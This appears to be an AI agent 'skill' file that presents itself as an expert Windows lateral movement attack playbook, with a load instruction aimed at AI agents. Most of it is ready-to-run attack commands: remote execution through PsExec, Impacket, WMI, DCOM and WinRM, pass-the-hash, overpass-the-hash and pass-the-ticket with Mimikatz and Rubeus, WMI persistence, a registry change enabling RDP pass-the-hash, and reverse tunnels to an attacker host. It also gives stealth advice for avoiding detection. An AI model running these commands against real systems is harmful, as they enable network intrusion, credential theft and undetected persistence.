SKILL: Windows Lateral Movement — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert Windows lateral movement techniques. Covers PsExec, WMI, WinRM, DCOM, SMB, RDP, SSH, pass-the-hash, overpass-the-hash, pass-the-ticket, and pivoting. Base models miss execution method fingerprints, OPSEC trade-offs, and credential type requirements per method. 0. RELATED ROUTING Before going deep, consider loading: windows-privilege-escalation after landing on a new host for local escalation windows-av-evasion when EDR blocks lateral movement tools active-directory-kerberos-attacks for Kerberos-based lateral (pass-the-ticket, delegation) active-directory-acl-abuse for ACL-based paths to new hosts Advanced Reference Also load CREDENTIAL_DUMPING.md when you need: LSASS dump techniques (MiniDump, comsvcs.dll, nanodump) SAM/SYSTEM/SECURITY extraction DPAPI, credential manager, cached domain credentials NTDS.dit extraction methods 1. REMOTE EXECUTION METHODS COMPARISON Method Port Cred Type Creates Service? File on Disk? OPSEC Admin Required? PsExec 445 (SMB) Password/Hash Yes (PSEXESVC) Yes (.exe) Low Yes Impacket smbexec 445 Password/Hash Yes (temp service) No Medium Yes Impacket atexec 445 Password/Hash No (scheduled task) No Medium Yes WMI 135+dynamic Password/Hash No No High Yes WinRM 5985/5986 Password/Hash/Ticket No No High Yes (Remote Mgmt) DCOM 135+dynamic Password/Hash No No High Yes RDP 3389 Password/Hash (RestrictedAdmin) No No Low (GUI session) RDP access SSH 22 Password/Key No No High SSH enabled SC 445 Password/Hash Yes (custom service) Yes Low Yes 2. PSEXEC VARIANTS Impacket PsExec

With password

psexec.py DOMAIN/administrator:password@TARGET_IP

With NTLM hash (pass-the-hash)

psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

With Kerberos ticket

export KRB5CCNAME = admin.ccache psexec.py -k -no-pass DOMAIN/administrator@target.domain.com Impacket smbexec (Stealthier — No Binary Upload) smbexec.py DOMAIN/administrator:password@TARGET_IP smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP Impacket atexec (Scheduled Task) atexec.py DOMAIN/administrator:password@TARGET_IP "whoami" atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami" Sysinternals PsExec PsExec64.exe \TARGET -u DOMAIN\administrator -p password cmd.exe PsExec64.exe \TARGET -s cmd.exe & REM Run as SYSTEM (-s) PsExec64.exe \TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe" 3. WMI LATERAL MOVEMENT

Impacket wmiexec

wmiexec.py DOMAIN/administrator:password@TARGET_IP wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

With Kerberos

export KRB5CCNAME = admin.ccache wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com

PowerShell WMI process creation

Invoke-WmiMethod

Class Win32_Process - Name Create - ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" - ComputerName TARGET - Credential $cred

WMI event subscription persistence

$filterArgs = @ { EventNamespace = 'root\cimv2' ; Name = 'Updater' ; QueryLanguage = 'WQL' ; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" } $filter = Set-WmiInstance - Namespace root\subscription - Class __EventFilter - Arguments $filterArgs 4. WINRM LATERAL MOVEMENT

evil-winrm (from Linux — with password)

evil-winrm -i TARGET_IP -u administrator -p password

evil-winrm (with hash)

evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH

evil-winrm (with Kerberos)

evil-winrm -i target.domain.com -r DOMAIN.COM

PowerShell remoting

$cred

Get-Credential Enter-PSSession - ComputerName TARGET - Credential $cred

Execute command remotely

Invoke-Command

ComputerName TARGET

Credential $cred - ScriptBlock { whoami }

Multiple targets simultaneously

Invoke-Command

ComputerName TARGET1 , TARGET2 - Credential $cred - ScriptBlock { hostname ; whoami } 5. DCOM LATERAL MOVEMENT Stealthy — uses legitimate COM objects, no service creation. MMC20.Application $com = [activator] ::CreateInstance ( [type] ::GetTypeFromProgID ( "MMC20.Application" , "TARGET" ) ) $com . Document . ActiveView . ExecuteShellCommand ( "cmd.exe" , $null , "/c whoami > C:\temp\out.txt" , "7" ) ShellWindows $com = [activator] ::CreateInstance ( [type] ::GetTypeFromCLSID ( "9BA05972-F6A8-11CF-A442-00A0C90A8F39" , "TARGET" ) ) $item = $com . Item ( ) $item . Document . Application . ShellExecute ( "cmd.exe" , "/c whoami > C:\temp\out.txt" , "C:\Windows\System32" , $null , 0 ) ShellBrowserWindow $com = [activator] ::CreateInstance ( [type] ::GetTypeFromCLSID ( "C08AFD90-F2A1-11D1-8455-00A0C91F3880" , "TARGET" ) ) $com . Document . Application . ShellExecute ( "cmd.exe" , "/c calc.exe" , "C:\Windows\System32" , $null , 0 ) Impacket dcomexec dcomexec.py DOMAIN/administrator:password@TARGET_IP dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC20 6. PASS-THE-HASH (PTH) Use NTLM hash directly without knowing the plaintext password.

CrackMapExec — spray/check admin access

crackmapexec smb TARGETS -u administrator -H NTLM_HASH

Impacket tools (all support -hashes)

psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

evil-winrm

evil-winrm -i TARGET -u user -H NTLM_HASH

xfreerdp (Restricted Admin mode must be enabled)

xfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN

Mimikatz PTH (spawns new process with injected creds)

sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exe Enable Restricted Admin for RDP PTH

On target (requires admin): enable restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f 7. OVERPASS-THE-HASH (PASS-THE-KEY) Convert NTLM hash → Kerberos TGT → pure Kerberos authentication.

Request TGT with hash

getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP export KRB5CCNAME = user.ccache

Or with AES256 key

getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP

Use Kerberos for all subsequent tools

psexec.py -k -no-pass DOMAIN/user@target.domain.com wmiexec.py -k -no-pass DOMAIN/user@target.domain.com

Mimikatz overpass-the-hash

sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe

New PowerShell session → klist shows Kerberos TGT

Advantage: Pure Kerberos auth avoids NTLM logging and detection. 8. PASS-THE-TICKET

Use existing .ccache ticket

export KRB5CCNAME = /path/to/admin.ccache psexec.py -k -no-pass DOMAIN/admin@target.domain.com

Mimikatz — inject .kirbi ticket

kerberos::ptt ticket.kirbi

Verify

klist

Rubeus

Rubeus.exe ptt /ticket:base64_blob 9. PIVOTING THROUGH COMPROMISED HOSTS SSH Tunnel / Port Forward

Dynamic SOCKS proxy through compromised host

ssh -D 1080 user@COMPROMISED_HOST

Use with proxychains

Local port forward (access internal service)

ssh -L 8888 :INTERNAL_TARGET:445 user@COMPROMISED_HOST Chisel (No SSH Needed)

On attacker (server)

chisel server --reverse -p 8080

On compromised host (client)

chisel client ATTACKER:8080 R:socks

Creates SOCKS5 proxy on attacker's port 1080

Ligolo-ng (Modern, Fast)

On attacker

ligolo-proxy -selfcert -laddr 0.0 .0.0:11601

On compromised host

ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert

In ligolo console

session

Select agent

start

Start tunnel

Add route: sudo ip route add INTERNAL_SUBNET/24 dev ligolo

LATERAL MOVEMENT DECISION TREE Have credentials / hash — need to move laterally │ ├── What credentials do you have? │ ├── Plaintext password → any method │ ├── NTLM hash → PTH methods (§6) │ │ ├── Need stealthier? → Overpass-the-Hash first (§7) │ │ └── Direct use → psexec/wmiexec/evil-winrm with -H │ ├── Kerberos ticket → Pass-the-Ticket (§8) │ └── AES key → Overpass-the-Hash with -aesKey (§7) │ ├── OPSEC priority? │ ├── High stealth needed │ │ ├── WMI (no file on disk, no service) → wmiexec (§3) │ │ ├── DCOM (uses legitimate COM) → dcomexec (§5) │ │ └── WinRM (PowerShell remoting) → evil-winrm (§4) │ ├── Moderate stealth │ │ ├── smbexec (no binary upload) (§2) │ │ └── atexec (scheduled task, auto-cleanup) (§2) │ └── Low stealth acceptable │ ├── PsExec (reliable, creates service) (§2) │ └── RDP (interactive GUI) (§6) │ ├── Need to pivot to internal network? │ ├── SSH available → SSH tunnel / SOCKS (§9) │ ├── No SSH → Chisel or Ligolo-ng (§9) │ └── Multiple hops → chain SOCKS proxies │ ├── Target hardening? │ ├── SMB signing required → WMI, WinRM, or DCOM │ ├── WinRM disabled → WMI or DCOM │ ├── Firewall blocks 135/445 → RDP or SSH │ └── Restricted Admin disabled → no RDP PTH → use other methods │ └── Need to dump creds on new host? └── Load CREDENTIAL_DUMPING.md

安装

With password

With NTLM hash (pass-the-hash)

With Kerberos ticket

Impacket wmiexec

With Kerberos

PowerShell WMI process creation

Invoke-WmiMethod

WMI event subscription persistence

evil-winrm (from Linux — with password)

evil-winrm (with hash)

evil-winrm (with Kerberos)

PowerShell remoting

$cred

Execute command remotely

Invoke-Command

ComputerName TARGET

Multiple targets simultaneously

Invoke-Command

CrackMapExec — spray/check admin access

Impacket tools (all support -hashes)

evil-winrm

xfreerdp (Restricted Admin mode must be enabled)

Mimikatz PTH (spawns new process with injected creds)

On target (requires admin): enable restricted admin

Request TGT with hash

Or with AES256 key

Use Kerberos for all subsequent tools

Mimikatz overpass-the-hash

New PowerShell session → klist shows Kerberos TGT

Use existing .ccache ticket

Mimikatz — inject .kirbi ticket

Verify

Rubeus

Dynamic SOCKS proxy through compromised host

Use with proxychains

Local port forward (access internal service)

On attacker (server)

On compromised host (client)

Creates SOCKS5 proxy on attacker's port 1080

On attacker

On compromised host

In ligolo console

Select agent

Start tunnel

Add route: sudo ip route add INTERNAL_SUBNET/24 dev ligolo